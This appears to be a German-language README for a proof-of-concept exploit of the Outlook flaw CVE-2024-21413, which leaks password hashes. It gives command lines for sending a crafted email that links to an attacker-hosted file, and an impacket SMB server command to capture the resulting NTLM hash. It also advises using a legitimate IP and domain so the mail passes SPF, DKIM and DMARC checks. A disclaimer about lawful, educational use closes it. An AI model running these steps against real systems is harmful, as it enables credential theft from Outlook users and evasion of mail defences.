
Microsoft Outlook Sicherheitslücke zur Offenlegung von Informationen (gibt Passwort-Hash preis) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : ist die freigegebene Testdatei (in diesem Fall Word) von der Angreifer-Maschine (xx.xx.xx.xx).
Um die Einhaltung von SPF, DKIM und DMARC zu gewährleisten, verwenden Sie eine legitime $IP und Domain.
Stellen Sie sicher, dass Sie die Bibliothek pexpect installieren, falls Sie dies noch nicht getan haben, mit
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Kudooooos & Details zu CVE-2024-21413 .
- Workaround/Fix:
[!CAUTION] ⚠️ Haftungsausschluss: WICHTIG: Dieses Skript wird ausschließlich für Bildungszwecke, ethische Tests und rechtmäßige Verwendung bereitgestellt. Verwenden Sie es nicht auf einem System oder Netzwerk ohne ausdrückliche Genehmigung. Unbefugter Zugriff auf Computersysteme und Netzwerke ist illegal, und Benutzer, die bei unbefugten Aktivitäten erwischt werden, unterliegen rechtlichen Schritten. Der Autor ist NICHT verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Skripts verursacht werden.